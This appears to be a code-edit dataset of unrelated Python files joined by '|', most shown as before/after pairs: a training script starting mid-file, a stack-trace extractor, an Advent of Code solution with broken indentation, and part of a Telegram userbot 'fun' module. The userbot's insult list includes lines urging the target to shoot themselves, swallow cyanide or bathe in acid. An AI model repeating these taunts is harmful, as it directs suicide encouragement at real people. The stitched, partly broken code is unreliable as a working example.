    path_data_dev = f"{BUCKET_DATA}/{args.path_dev}"
    if not os.path.isfile(path_data_dev):
        logs.send(f"Dev data set {path_data_dev} not found.",
                  lineno=logs.get_line(),
                  kill=True)
    # the test set is optional and silently dropped when the file is missing
    path_data_test = None
    if args.path_test:
        path_data_test = f"{BUCKET_DATA}/{args.path_test}"
        path_data_test = path_data_test if os.path.isfile(path_data_test) else None
    # build corpus to train and eval model
    try:
        corpus = model_module.Corpus(path_train=path_data_train,
                                     path_dev=path_data_dev,
                                     path_test=path_data_test)
    except Exception as ex:
        logs.send(f"Corpus extraction error.\nError: {ex}",
                  lineno=logs.get_line(),
                  kill=True)
    # instantiate the model (optionally pre-loading a checkpoint)
    logs.send("Defining the model.", is_error=False, kill=False)
    path_model = args.path_model
    if path_model:
        logs.send(f"Pre-trained model from {path_model} is being pre-loaded.",
                  is_error=False,
                  kill=False)
    model = model_module.Model(path=path_model)
    train_config = None
    if args.train_config:
        # NOTE(review): `err` is silently discarded — a malformed
        # --train-config falls back to train_config=None; consider logging it.
        train_config, err = train_configs_parser(args.train_config)
    logs.send("Start model training.", is_error=False, kill=False)
    t0 = time.time()
    train_metrics = model.train(corpus=corpus,
                                evaluate=True,
                                config=train_config)
    logs.send(f"Training completed. Elapsed time {round(time.time() - t0, 2)} sec.",
              is_error=False,
              kill=False)
    logs.send(f"Model score:\n{json.dumps(train_metrics, indent=2)}",
              is_error=False,
              kill=False)
    if args.path_model_out:
        dir_model = BUCKET_MODEL
        path_model = f"{dir_model}/{args.path_model_out}"
    else:
        dir_model = get_model_dir()
        # single quotes in the nested strftime call: double quotes here were
        # Python >= 3.12-only syntax (PEP 701) and broke older interpreters.
        # NOTE(review): '%s' (platform-specific epoch seconds) looks like it
        # was meant to be '%S' — confirm before changing the file-name format.
        path_model = f"{dir_model}/{MODEL_VERSION}_{time.strftime('%Y%m%dT%H%M%sZ', time.gmtime())}.pt"
    logs.send(f"Saving model to {path_model}", is_error=False, kill=False)
    if not os.path.isdir(f"{dir_model}"):
        try:
            os.makedirs(dir_model)
        except Exception as ex:
            logs.send(f"Error when creating {dir_model}.\nError: {ex}",
                      lineno=logs.get_line(),
                      kill=True)
    # further steps should be defined depending on the tool use case
    try:
        model.save(path_model)
    except Exception as ex:
        logs.send(f"Cannot save the model to {path_model}. Error:\n{ex}",
                  lineno=logs.get_line(),
                  kill=True)
| # Dmitry Kisler © 2020-present
# www.dkisler.com
import os
import pathlib
import time
import importlib
import argparse
import json
from typing import Tuple, Union
from tagger_framework.utils.logger import getLogger
import warnings
warnings.simplefilter(action='ignore',
category=FutureWarning)
# model plug-in location and storage buckets (overridable via env vars)
MODEL_PKG_NAME = "tagger_framework.tagger.pos"
MODEL_VERSION = os.getenv("MODEL_VERSION", "v1")
BUCKET_DATA = os.getenv("BUCKET_DATA", "/data")
BUCKET_MODEL = os.getenv("BUCKET_MODEL", "/model")


def get_model_dir() -> str:
    """Return the dated model output directory: <bucket>/<version>/YYYY/MM/DD (UTC)."""
    date_part = time.strftime('%Y/%m/%d', time.gmtime())
    return "/".join((BUCKET_MODEL, MODEL_VERSION, date_part))
def get_args() -> argparse.Namespace:
    """Input parameters parser.

    Returns:
      Namespace of stdin parameters.
    """
    parser = argparse.ArgumentParser(description="Model trainer.")
    # train/dev corpora are mandatory; test corpus and model paths are optional
    parser.add_argument('--path-train',
                        help="Path to train corpus.",
                        type=str,
                        default=None,
                        required=True)
    parser.add_argument('--path-dev',
                        help="Path to dev corpus.",
                        type=str,
                        default=None,
                        required=True)
    parser.add_argument('--path-test',
                        help="Path to test corpus.",
                        type=str,
                        default=None,
                        required=False)
    parser.add_argument('--path-model',
                        help="Path to pre-trained model.",
                        type=str,
                        default=None,
                        required=False)
    parser.add_argument('--path-model-out',
                        help="Path to store model into.",
                        type=str,
                        default=None,
                        required=False)
    # free-form JSON, decoded later by train_configs_parser
    parser.add_argument('--train-config',
                        help="""Configurations for model training as JSON.
                        Example:
                        {"learning_rate": 0.00001}
                        """,
                        type=str,
                        default=None,
                        required=False)
    args = parser.parse_args()
    return args
def train_configs_parser(conf: str) -> Tuple[Union[dict, None],
                                             Union[None, str]]:
    """Function to parse training parameters config.

    Args:
      conf: Input configs string.

    Returns:
      (parsed_config, None) on success, (None, error) on invalid JSON.
    """
    try:
        parsed = json.loads(conf)
    except json.JSONDecodeError as ex:
        return None, ex
    return parsed, None
# Training entry point: build the corpus, train/evaluate the model, persist it.
if __name__ == "__main__":
    logs = getLogger(logger=f"service/train/{MODEL_VERSION}")
    logs.send("Init.", is_error=False, kill=False)
    # link the model module (<MODEL_PKG_NAME>.<MODEL_VERSION>.model)
    try:
        model_module = importlib.import_module(f"{MODEL_PKG_NAME}.{MODEL_VERSION}.model")
    except Exception as ex:
        logs.send(f"Model {MODEL_VERSION} is not defined in the package {MODEL_PKG_NAME}.\nError:{ex}",
                  lineno=logs.get_line(),
                  kill=True)
    args = get_args()
    logs.send("Reading data and building corpus.", is_error=False, kill=False)
    # read train data corpus
    path_data_train = f"{BUCKET_DATA}/{args.path_train}"
    if not os.path.isfile(path_data_train):
        logs.send(f"Train data set {path_data_train} not found.",
                  lineno=logs.get_line(),
                  kill=True)
    path_data_dev = f"{BUCKET_DATA}/{args.path_dev}"
    if not os.path.isfile(path_data_dev):
        logs.send(f"Dev data set {path_data_dev} not found.",
                  lineno=logs.get_line(),
                  kill=True)
    # the test set is optional and silently dropped when the file is missing
    path_data_test = None
    if args.path_test:
        path_data_test = f"{BUCKET_DATA}/{args.path_test}"
        path_data_test = path_data_test if os.path.isfile(path_data_test) else None
    # build corpus to train and eval model
    try:
        corpus = model_module.Corpus(path_train=path_data_train,
                                     path_dev=path_data_dev,
                                     path_test=path_data_test)
    except Exception as ex:
        logs.send(f"Corpus extraction error.\nError: {ex}",
                  lineno=logs.get_line(),
                  kill=True)
    # instantiate the model (optionally pre-loading a checkpoint)
    logs.send("Defining the model.", is_error=False, kill=False)
    path_model = args.path_model
    if path_model:
        logs.send(f"Pre-trained model from {path_model} is being pre-loaded.",
                  is_error=False,
                  kill=False)
    model = model_module.Model(path=path_model)
    train_config = None
    if args.train_config:
        # NOTE(review): `err` is silently discarded — a malformed
        # --train-config falls back to train_config=None; consider logging it.
        train_config, err = train_configs_parser(args.train_config)
    logs.send("Start model training.", is_error=False, kill=False)
    t0 = time.time()
    train_metrics = model.train(corpus=corpus,
                                evaluate=True,
                                config=train_config)
    logs.send(f"Training completed. Elapsed time {round(time.time() - t0, 2)} sec.",
              is_error=False,
              kill=False)
    logs.send(f"Model score:\n{json.dumps(train_metrics, indent=2)}",
              is_error=False,
              kill=False)
    if args.path_model_out:
        dir_model = BUCKET_MODEL
        path_model = f"{dir_model}/{args.path_model_out}"
    else:
        dir_model = get_model_dir()
        # NOTE(review): '%s' (platform-specific epoch seconds) looks like it
        # was meant to be '%S' — confirm before changing the file-name format.
        path_model = f"{dir_model}/{MODEL_VERSION}_{time.strftime('%Y%m%dT%H%M%sZ', time.gmtime())}.pt"
    logs.send(f"Saving model to {path_model}", is_error=False, kill=False)
    if not os.path.isdir(f"{dir_model}"):
        try:
            os.makedirs(dir_model)
        except Exception as ex:
            logs.send(f"Error when creating {dir_model}.\nError: {ex}",
                      lineno=logs.get_line(),
                      kill=True)
    # further steps should be defined depending on the tool use case
    try:
        model.save(path_model)
    except Exception as ex:
        logs.send(f"Cannot save the model to {path_model}. Error:\n{ex}",
                  lineno=logs.get_line(),
                  kill=True)
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import glob
import os
import re
from typing import List
from confidential_ml_utils.exceptions import (
PublicValueError,
print_prefixed_stack_trace_and_raise,
)
class StackTraceExtractor:
    """
    A class to perform extraction of stack traces, exception types and
    optionally exception messages from files that might contain other
    sensitive data.

    Attributes
    ----------
    show_exception_message : bool
        True to extract exception messages. False to skip them.
    prefix : str
        Prefix to prepend extracted lines with. Defaults to "SystemLog".

    Methods
    -------
    extract(path):
        Extracts traces and exceptions from file to stdout.
    """

    def __init__(
        self,
        show_exception_message: bool = False,
        prefix: str = "SystemLog",
    ):
        # True while scanning between a "Traceback ..." header and its
        # terminating exception line in a Python log
        self.in_python_traceback = False
        self.show_exception_message = show_exception_message
        self.prefix = prefix

    def _parse_trace_python(self, string: str):
        """Match one line of a Python traceback; return the re.Match or None."""
        r = re.compile(r"Traceback \(most recent call last\):")
        m = r.search(string)
        if m:
            self.in_python_traceback = True
            return None
        r = re.compile(r"File (?P<file>.*), line (?P<line>\d*), in (?P<method>.*)")
        m = r.search(string)
        if m:
            return m
        r = re.compile(r"(?P<type>.*Error): (?P<message>.*)")
        m = r.search(string)
        # an exception line only counts if a traceback header preceded it
        if m and self.in_python_traceback:
            self.in_python_traceback = False
            return m
        return None

    @staticmethod
    def _parse_trace_csharp(string: str):
        """Match one line of a C# stack trace; return the re.Match or None."""
        r = re.compile(
            r"at (?P<namespace>.*)\.(?P<class>.*)\.(?P<method>.*) in (?P<file>.*):line (?P<line>\d*)"  # noqa:501
        )
        m = r.search(string)
        if m:
            return m
        r = re.compile(r"Unhandled exception. (?P<type>.*): (?P<message>.*)")
        m = r.search(string)
        if m:
            return m
        return None

    def _parse_file(self, file: str) -> None:
        """Print the extracted trace fields of one file, each line prefixed."""
        print(f"{self.prefix}: Parsing file {os.path.abspath(file)}")
        with open(file, "r") as f:
            for line in f:
                # single-quoted subscripts: double quotes nested in these
                # f-strings required Python >= 3.12 (PEP 701)
                m = StackTraceExtractor._parse_trace_csharp(line)
                if m and m.groupdict().get("type"):
                    print(f"{self.prefix}: type: {m.groupdict()['type']}")
                    if self.show_exception_message:
                        print(f"{self.prefix}: message: {m.groupdict()['message']}")
                    continue
                elif m and m.groupdict().get("namespace"):
                    print(f"{self.prefix}: namespace: {m.groupdict()['namespace']}")
                    print(f"{self.prefix}: class: {m.groupdict()['class']}")
                    print(f"{self.prefix}: method: {m.groupdict()['method']}")
                    print(f"{self.prefix}: file: {m.groupdict()['file']}")
                    print(f"{self.prefix}: line: {m.groupdict()['line']}")
                    print()
                    continue
                m = self._parse_trace_python(line)
                if m and m.groupdict().get("type"):
                    print(f"{self.prefix}: type: {m.groupdict()['type']}")
                    if self.show_exception_message:
                        print(f"{self.prefix}: message: {m.groupdict()['message']}")
                    print()
                elif m and m.groupdict().get("file"):
                    print(f"{self.prefix}: file: {m.groupdict()['file']}")
                    print(f"{self.prefix}: line: {m.groupdict()['line']}")
                    print(f"{self.prefix}: method: {m.groupdict()['method']}")

    def _get_files(self, path) -> List[str]:
        """Resolve *path* to the files to parse ('*.err' files for a directory)."""
        if os.path.isfile(path):
            print(f"{self.prefix}: Input is a file")
            return [path]
        if os.path.isdir(path):
            print(f"{self.prefix}: Input is a directory")
            files = glob.glob(path + "/*.err")
            return files
        else:
            raise PublicValueError("Provided path is neither a file nor a directory")

    def extract(self, path: str) -> None:
        """
        Run extraction on the given resources. Extracted traces and exceptions
        will be printed to stdout.

        Args:
            path (str): file or path. If path, extraction will be performed on
            all files with '.err' extension within that directory (not recursive).
            Hidden files will be ignored.
        """
        try:
            for file in self._get_files(path):
                self._parse_file(file)
            # removed a stray `assert False` that forced every successful
            # extraction into the error path below (and disappeared under -O)
        except BaseException as e:
            print(f"{self.prefix}: There is a problem with the exceptionExtractor.")
            print_prefixed_stack_trace_and_raise(err=e, keep_message=True)
| # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import glob
import os
import re
from typing import List
from confidential_ml_utils.exceptions import (
PublicValueError,
print_prefixed_stack_trace_and_raise,
)
class StackTraceExtractor:
    """
    A class to perform extraction of stack traces, exception types and
    optionally exception messages from files that might contain other
    sensitive data.

    Attributes
    ----------
    show_exception_message : bool
        True to extract exception messages. False to skip them.
    prefix : str
        Prefix to prepend extracted lines with. Defaults to "SystemLog".

    Methods
    -------
    extract(path):
        Extracts traces and exceptions from file to stdout.
    """
    def __init__(
        self,
        show_exception_message: bool = False,
        prefix: str = "SystemLog",
    ):
        # True while scanning between a "Traceback ..." header and its
        # terminating exception line in a Python log
        self.in_python_traceback = False
        self.show_exception_message = show_exception_message
        self.prefix = prefix
    def _parse_trace_python(self, string: str):
        """Match one line of a Python traceback; return the re.Match or None."""
        r = re.compile(r"Traceback \(most recent call last\):")
        m = r.search(string)
        if m:
            self.in_python_traceback = True
            return None
        r = re.compile(r"File (?P<file>.*), line (?P<line>\d*), in (?P<method>.*)")
        m = r.search(string)
        if m:
            return m
        r = re.compile(r"(?P<type>.*Error): (?P<message>.*)")
        m = r.search(string)
        # an exception line only counts if a traceback header preceded it
        if m and self.in_python_traceback:
            self.in_python_traceback = False
            return m
        return None
    @staticmethod
    def _parse_trace_csharp(string: str):
        """Match one line of a C# stack trace; return the re.Match or None."""
        r = re.compile(
            r"at (?P<namespace>.*)\.(?P<class>.*)\.(?P<method>.*) in (?P<file>.*):line (?P<line>\d*)"  # noqa:501
        )
        m = r.search(string)
        if m:
            return m
        r = re.compile(r"Unhandled exception. (?P<type>.*): (?P<message>.*)")
        m = r.search(string)
        if m:
            return m
        return None
    def _parse_file(self, file: str) -> None:
        """Print the extracted trace fields of one file, each line prefixed."""
        print(f"{self.prefix}: Parsing file {os.path.abspath(file)}")
        with open(file, "r") as f:
            for line in f:
                m = StackTraceExtractor._parse_trace_csharp(line)
                if m and m.groupdict().get("type"):
                    print(f"{self.prefix}: type: {m.groupdict()['type']}")
                    if self.show_exception_message:
                        print(f"{self.prefix}: message: {m.groupdict()['message']}")
                    continue
                elif m and m.groupdict().get("namespace"):
                    print(f"{self.prefix}: namespace: {m.groupdict()['namespace']}")
                    print(f"{self.prefix}: class: {m.groupdict()['class']}")
                    print(f"{self.prefix}: method: {m.groupdict()['method']}")
                    print(f"{self.prefix}: file: {m.groupdict()['file']}")
                    print(f"{self.prefix}: line: {m.groupdict()['line']}")
                    print()
                    continue
                m = self._parse_trace_python(line)
                if m and m.groupdict().get("type"):
                    print(f"{self.prefix}: type: {m.groupdict()['type']}")
                    if self.show_exception_message:
                        print(f"{self.prefix}: message: {m.groupdict()['message']}")
                    print()
                elif m and m.groupdict().get("file"):
                    print(f"{self.prefix}: file: {m.groupdict()['file']}")
                    print(f"{self.prefix}: line: {m.groupdict()['line']}")
                    print(f"{self.prefix}: method: {m.groupdict()['method']}")
    def _get_files(self, path) -> List[str]:
        """Resolve *path* to the files to parse ('*.err' files for a directory)."""
        if os.path.isfile(path):
            print(f"{self.prefix}: Input is a file")
            return [path]
        if os.path.isdir(path):
            print(f"{self.prefix}: Input is a directory")
            files = glob.glob(path + "/*.err")
            return files
        else:
            raise PublicValueError("Provided path is neither a file nor a directory")
    def extract(self, path: str) -> None:
        """
        Run extraction on the given resources. Extracted traces and exceptions
        will be printed to stdout.

        Args:
            path (str): file or path. If path, extraction will be performed on
            all files with '.err' extension within that directory (not recursive).
            Hidden files will be ignored.
        """
        try:
            for file in self._get_files(path):
                self._parse_file(file)
            # NOTE(review): this assert always fires, forcing every successful
            # extraction into the error path below (and it disappears under
            # `python -O`) — looks like leftover debug/fault-injection code;
            # confirm intent and remove.
            assert False
        except BaseException as e:
            print(f"{self.prefix}: There is a problem with the exceptionExtractor.")
            print_prefixed_stack_trace_and_raise(err=e, keep_message=True)
|
""" https://adventofcode.com/2018/day/3 """
def readFile():
    """Parse input.txt (claims like '#1 @ 3,2: 5x4') into
    [{'id': int, 'fields': [(x, y), ...]}, ...]."""
    import os
    claims = []
    # Resolve input.txt next to this script. The old
    # __file__.rstrip("code.py") stripped a *character set* (c,o,d,e,.,p,y),
    # not the suffix, so it could also eat trailing directory characters.
    path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "input.txt")
    with open(path, "r") as f:
        for line in f:
            parts = line.split(" ")
            offset = parts[2].split(",")
            size = parts[3].split("x")
            left = int(offset[0])
            top = int(offset[1][:-1])  # drop the trailing ':'
            width, height = int(size[0]), int(size[1])
            # same (x, y) enumeration order as the old nested loops
            fields = [(i, j)
                      for i in range(left, left + width)
                      for j in range(top, top + height)]
            claims.append({
                "id": int(parts[0][1:]),  # '#12' -> 12
                "fields": fields
            })
    return claims
def part1(vals : list):
    """Return the number of fabric cells claimed by more than one claim.

    Args:
        vals: list of {'id': int, 'fields': [(x, y), ...]} claims.
    """
    from collections import Counter
    # one C-level pass replaces the manual dict-building loop
    counts = Counter(str(field) for val in vals for field in val["fields"])
    return sum(1 for c in counts.values() if c > 1)
def part2(vals : list):
    """Return the id of the single claim that overlaps no other claim,
    or None when every claim overlaps something.

    Args:
        vals: list of {'id': int, 'fields': [(x, y), ...]} claims.
    """
    from collections import Counter
    counts = Counter(str(field) for val in vals for field in val["fields"])
    for val in vals:
        # a clean claim is one whose every cell was counted exactly once
        if all(counts[str(field)] == 1 for field in val["fields"]):
            return val["id"]
    return None
if __name__ == "__main__":
vals = readFile()
print(f"Part 1: {part1(vals)}")
print(f"Part 2: {part2(vals)}") | """ https://adventofcode.com/2018/day/3 """
def readFile():
    """Parse input.txt (claims like '#1 @ 3,2: 5x4') into
    [{'id': int, 'fields': [(x, y), ...]}, ...]."""
    import os
    claims = []
    # Resolve input.txt next to this script. The old
    # __file__.rstrip('code.py') stripped a *character set* (c,o,d,e,.,p,y),
    # not the suffix, so it could also eat trailing directory characters.
    path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "input.txt")
    with open(path, "r") as f:
        for line in f:
            parts = line.split(" ")
            offset = parts[2].split(",")
            size = parts[3].split("x")
            left = int(offset[0])
            top = int(offset[1][:-1])  # drop the trailing ':'
            width, height = int(size[0]), int(size[1])
            # same (x, y) enumeration order as the old nested loops
            fields = [(i, j)
                      for i in range(left, left + width)
                      for j in range(top, top + height)]
            claims.append({
                "id": int(parts[0][1:]),  # '#12' -> 12
                "fields": fields
            })
    return claims
def part1(vals : list):
    """Count the fabric cells claimed by more than one claim."""
    cell_counts = {}
    # tally how many claims cover each cell
    for claim in vals:
        for cell in claim["fields"]:
            key = str(cell)
            cell_counts[key] = cell_counts.get(key, 0) + 1
    # cells hit at least twice are overlapping
    return sum(1 for hits in cell_counts.values() if hits > 1)
def part2(vals : list):
    """Return the id of the single claim that overlaps no other claim
    (implicitly None when every claim overlaps something)."""
    cell_counts = {}
    # tally how many claims cover each cell
    for claim in vals:
        for cell in claim["fields"]:
            key = str(cell)
            cell_counts[key] = cell_counts.get(key, 0) + 1
    # the clean claim is the one whose every cell was counted exactly once
    for claim in vals:
        if all(cell_counts[str(cell)] == 1 for cell in claim["fields"]):
            return claim["id"]
if __name__ == "__main__":
vals = readFile()
print(f"Part 1: {part1(vals)}")
print(f"Part 2: {part2(vals)}") |
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
""" Userbot module for having some fun with people. """
from asyncio import sleep
from random import choice, getrandbits, randint
from re import sub
import time
from collections import deque
import requests
from cowpy import cow
from userbot import CMD_HELP
from userbot.events import register
from userbot.modules.admin import get_user_from_event
# ================= CONSTANT =================
METOOSTR = [
"Me too thanks",
"Haha yes, me too",
"Same lol",
"Me irl",
"Same here",
"Haha yes",
"Me rn",
]
ZALG_LIST = [[
"̖",
" ̗",
" ̘",
" ̙",
" ̜",
" ̝",
" ̞",
" ̟",
" ̠",
" ̤",
" ̥",
" ̦",
" ̩",
" ̪",
" ̫",
" ̬",
" ̭",
" ̮",
" ̯",
" ̰",
" ̱",
" ̲",
" ̳",
" ̹",
" ̺",
" ̻",
" ̼",
" ͅ",
" ͇",
" ͈",
" ͉",
" ͍",
" ͎",
" ͓",
" ͔",
" ͕",
" ͖",
" ͙",
" ͚",
" ",
],
[
" ̍",
" ̎",
" ̄",
" ̅",
" ̿",
" ̑",
" ̆",
" ̐",
" ͒",
" ͗",
" ͑",
" ̇",
" ̈",
" ̊",
" ͂",
" ̓",
" ̈́",
" ͊",
" ͋",
" ͌",
" ̃",
" ̂",
" ̌",
" ͐",
" ́",
" ̋",
" ̏",
" ̽",
" ̉",
" ͣ",
" ͤ",
" ͥ",
" ͦ",
" ͧ",
" ͨ",
" ͩ",
" ͪ",
" ͫ",
" ͬ",
" ͭ",
" ͮ",
" ͯ",
" ̾",
" ͛",
" ͆",
" ̚",
],
[
" ̕",
" ̛",
" ̀",
" ́",
" ͘",
" ̡",
" ̢",
" ̧",
" ̨",
" ̴",
" ̵",
" ̶",
" ͜",
" ͝",
" ͞",
" ͟",
" ͠",
" ͢",
" ̸",
" ̷",
" ͡",
]]
EMOJIS = [
"😂",
"😂",
"👌",
"✌",
"💞",
"👍",
"👌",
"💯",
"🎶",
"👀",
"😂",
"👓",
"👏",
"👐",
"🍕",
"💥",
"🍴",
"💦",
"💦",
"🍑",
"🍆",
"😩",
"😏",
"👉👌",
"👀",
"👅",
"😩",
"🚰",
]
INSULT_STRINGS = [
"Owww ... Such a stupid idiot.",
"Don't drink and type.",
"I think you should go home or better a mental asylum.",
"Command not found. Just like your brain.",
"Do you realize you are making a fool of yourself? Apparently not.",
"You can type better than that.",
"Bot rule 544 section 9 prevents me from replying to stupid humans like you.",
"Sorry, we do not sell brains.",
"Believe me you are not normal.",
"I bet your brain feels as good as new, seeing that you never use it.",
"If I wanted to kill myself I'd climb your ego and jump to your IQ.",
"Zombies eat brains... you're safe.",
"You didn't evolve from apes, they evolved from you.",
"Come back and talk to me when your I.Q. exceeds your age.",
"I'm not saying you're stupid, I'm just saying you've got bad luck when it comes to thinking.",
"What language are you speaking? Cause it sounds like bullshit.",
"Stupidity is not a crime so you are free to go.",
"You are proof that evolution CAN go in reverse.",
"I would ask you how old you are but I know you can't count that high.",
"As an outsider, what do you think of the human race?",
"Brains aren't everything. In your case they're nothing.",
"Ordinarily people live and learn. You just live.",
"I don't know what makes you so stupid, but it really works.",
"Keep talking, someday you'll say something intelligent! (I doubt it though)",
"Shock me, say something intelligent.",
"Your IQ's lower than your shoe size.",
"Alas! Your neurotransmitters are no more working.",
"Are you crazy you fool.",
"Everyone has the right to be stupid but you are abusing the privilege.",
"I'm sorry I hurt your feelings when I called you stupid. I thought you already knew that.",
"You should try tasting cyanide.",
"Your enzymes are meant to digest rat poison.",
"You should try sleeping forever.",
"Pick up a gun and shoot yourself.",
"You could make a world record by jumping from a plane without parachute.",
"Stop talking BS and jump in front of a running bullet train.",
"Try bathing with Hydrochloric Acid instead of water.",
"Try this: if you hold your breath underwater for an hour, you can then hold it forever.",
"Go Green! Stop inhaling Oxygen.",
"God was searching for you. You should leave to meet him.",
"give your 100%. Now, go donate blood.",
"Try jumping from a hundred story building but you can do it only once.",
"You should donate your brain seeing that you never used it.",
"Volunteer for target in an firing range.",
"Head shots are fun. Get yourself one.",
"You should try swimming with great white sharks.",
"You should paint yourself red and run in a bull marathon.",
"You can stay underwater for the rest of your life without coming back up.",
"How about you stop breathing for like 1 day? That'll be great.",
"Try provoking a tiger while you both are in a cage.",
"Have you tried shooting yourself as high as 100m using a canon.",
"You should try holding TNT in your mouth and igniting it.",
"Try playing catch and throw with RDX its fun.",
"I heard phogine is poisonous but i guess you wont mind inhaling it for fun.",
"Launch yourself into outer space while forgetting oxygen on Earth.",
"You should try playing snake and ladders, with real snakes and no ladders.",
"Dance naked on a couple of HT wires.",
"Active Volcano is the best swimming pool for you.",
"You should try hot bath in a volcano.",
"Try to spend one day in a coffin and it will be yours forever.",
"Hit Uranium with a slow moving neutron in your presence. It will be a worthwhile experience.",
"You can be the first person to step on sun. Have a try.",
]
UWUS = [
"(・`ω´・)",
";;w;;",
"owo",
"UwU",
">w<",
"^w^",
r"\(^o\) (/o^)/",
"( ^ _ ^)∠☆",
"(ô_ô)",
"~:o",
";-;",
"(*^*)",
"(>_",
"(♥_♥)",
"*(^O^)*",
"((+_+))",
]
FACEREACTS = [
"ʘ‿ʘ",
"ヾ(-_- )ゞ",
"(っ˘ڡ˘ς)",
"(´ж`ς)",
"( ಠ ʖ̯ ಠ)",
"(° ͜ʖ͡°)╭∩╮",
"(ᵟຶ︵ ᵟຶ)",
"(งツ)ว",
"ʚ(•`",
"(っ▀¯▀)つ",
"(◠﹏◠)",
"( ͡ಠ ʖ̯ ͡ಠ)",
"( ఠ ͟ʖ ఠ)",
"(∩`-´)⊃━☆゚.*・。゚",
"(⊃。•́‿•̀。)⊃",
"(._.)",
"{•̃_•̃}",
"(ᵔᴥᵔ)",
"♨_♨",
"⥀.⥀",
"ح˚௰˚づ ",
"(҂◡_◡)",
"ƪ(ړײ)ƪ",
"(っ•́。•́)♪♬",
"◖ᵔᴥᵔ◗ ♪ ♫ ",
"(☞゚ヮ゚)☞",
"[¬º-°]¬",
"(Ծ‸ Ծ)",
"(•̀ᴗ•́)و ̑̑",
"ヾ(´〇`)ノ♪♪♪",
"(ง'̀-'́)ง",
"ლ(•́•́ლ)",
"ʕ •́؈•̀ ₎",
"♪♪ ヽ(ˇ∀ˇ )ゞ",
"щ(゚Д゚щ)",
"( ˇ෴ˇ )",
"눈_눈",
"(๑•́ ₃ •̀๑) ",
"( ˘ ³˘)♥ ",
"ԅ(≖‿≖ԅ)",
"♥‿♥",
"◔_◔",
"⁽⁽ଘ( ˊᵕˋ )ଓ⁾⁾",
"乁( ◔ ౪◔)「 ┑( ̄Д  ̄)┍",
"( ఠൠఠ )ノ",
"٩(๏_๏)۶",
"┌(ㆆ㉨ㆆ)ʃ",
"ఠ_ఠ",
"(づ。◕‿‿◕。)づ",
"(ノಠ ∩ಠ)ノ彡( \\o°o)\\",
"“ヽ(´▽`)ノ”",
"༼ ༎ຶ ෴ ༎ຶ༽",
"。゚( ゚இ‸இ゚)゚。",
"(づ ̄ ³ ̄)づ",
"(⊙.☉)7",
"ᕕ( ᐛ )ᕗ",
"t(-_-t)",
"(ಥ⌣ಥ)",
"ヽ༼ ಠ益ಠ ༽ノ",
"༼∵༽ ༼⍨༽ ༼⍢༽ ༼⍤༽",
"ミ●﹏☉ミ",
"(⊙_◎)",
"¿ⓧ_ⓧﮌ",
"ಠ_ಠ",
"(´・_・`)",
"ᕦ(ò_óˇ)ᕤ",
"⊙﹏⊙",
"(╯°□°)╯︵ ┻━┻",
r"¯\_(⊙︿⊙)_/¯",
"٩◔̯◔۶",
"°‿‿°",
"ᕙ(⇀‸↼‶)ᕗ",
"⊂(◉‿◉)つ",
"V•ᴥ•V",
"q(❂‿❂)p",
"ಥ_ಥ",
"ฅ^•ﻌ•^ฅ",
"ಥ﹏ಥ",
"( ^_^)o自自o(^_^ )",
"ಠ‿ಠ",
"ヽ(´▽`)/",
"ᵒᴥᵒ#",
"( ͡° ͜ʖ ͡°)",
"┬─┬ ノ( ゜-゜ノ)",
"ヽ(´ー`)ノ",
"☜(⌒▽⌒)☞",
"ε=ε=ε=┌(;*´Д`)ノ",
"(╬ ಠ益ಠ)",
"┬─┬⃰͡ (ᵔᵕᵔ͜ )",
"┻━┻ ︵ヽ(`Д´)ノ︵ ┻━┻",
r"¯\_(ツ)_/¯",
"ʕᵔᴥᵔʔ",
"(`・ω・´)",
"ʕ•ᴥ•ʔ",
"ლ(`ー´ლ)",
"ʕʘ̅͜ʘ̅ʔ",
"( ゚Д゚)",
r"¯\(°_o)/¯",
"(。◕‿◕。)",
]
RUNS_STR = [
"Runs to Thanos..",
"Runs far, far away from earth..",
"Running faster than Bolt coz i'mma userbot !!",
"Runs to Marie..",
"This Group is too cancerous to deal with.",
"Cya bois",
"Kys",
"I go away",
"I am just walking off, coz me is too fat.",
"I Fugged off!",
"Will run for chocolate.",
"I run because I really like food.",
"Running...\nbecause dieting is not an option.",
"Wicked fast runnah",
"If you wanna catch me, you got to be fast...\nIf you wanna stay with me, you got to be good...\nBut if you wanna pass me...\nYou've got to be kidding.",
"Anyone can run a hundred meters, it's the next forty-two thousand and two hundred that count.",
"Why are all these people following me?",
"Are the kids still chasing me?",
"Running a marathon...there's an app for that.",
]
CHASE_STR = [
"Where do you think you're going?",
"Huh? what? did they get away?",
"ZZzzZZzz... Huh? what? oh, just them again, nevermind.",
"Get back here!",
"Not so fast...",
"Look out for the wall!",
"Don't leave me alone with them!!",
"You run, you die.",
"Jokes on you, I'm everywhere",
"You're gonna regret that...",
"You could also try /kickme, I hear that's fun.",
"Go bother someone else, no-one here cares.",
"You can run, but you can't hide.",
"Is that all you've got?",
"I'm behind you...",
"You've got company!",
"We can do this the easy way, or the hard way.",
"You just don't get it, do you?",
"Yeah, you better run!",
"Please, remind me how much I care?",
"I'd run faster if I were you.",
"That's definitely the droid we're looking for.",
"May the odds be ever in your favour.",
"Famous last words.",
"And they disappeared forever, never to be seen again.",
"\"Oh, look at me! I'm so cool, I can run from a bot!\" - this person",
"Yeah yeah, just tap /kickme already.",
"Here, take this ring and head to Mordor while you're at it.",
"Legend has it, they're still running...",
"Unlike Harry Potter, your parents can't protect you from me.",
"Fear leads to anger. Anger leads to hate. Hate leads to suffering. If you keep running in fear, you might "
"be the next Vader.",
"Multiple calculations later, I have decided my interest in your shenanigans is exactly 0.",
"Legend has it, they're still running.",
"Keep it up, not sure we want you here anyway.",
"You're a wiza- Oh. Wait. You're not Harry, keep moving.",
"NO RUNNING IN THE HALLWAYS!",
"Hasta la vista, baby.",
"Who let the dogs out?",
"It's funny, because no one cares.",
"Ah, what a waste. I liked that one.",
"Frankly, my dear, I don't give a damn.",
"My milkshake brings all the boys to yard... So run faster!",
"You can't HANDLE the truth!",
"A long time ago, in a galaxy far far away... Someone would've cared about that. Not anymore though.",
"Hey, look at them! They're running from the inevitable banhammer... Cute.",
"Han shot first. So will I.",
"What are you running after, a white rabbit?",
"As The Doctor would say... RUN!",
]
HELLOSTR = [
"Hi !",
"‘Ello, gov'nor!",
"What’s crackin’?",
"‘Sup, homeslice?",
"Howdy, howdy ,howdy!",
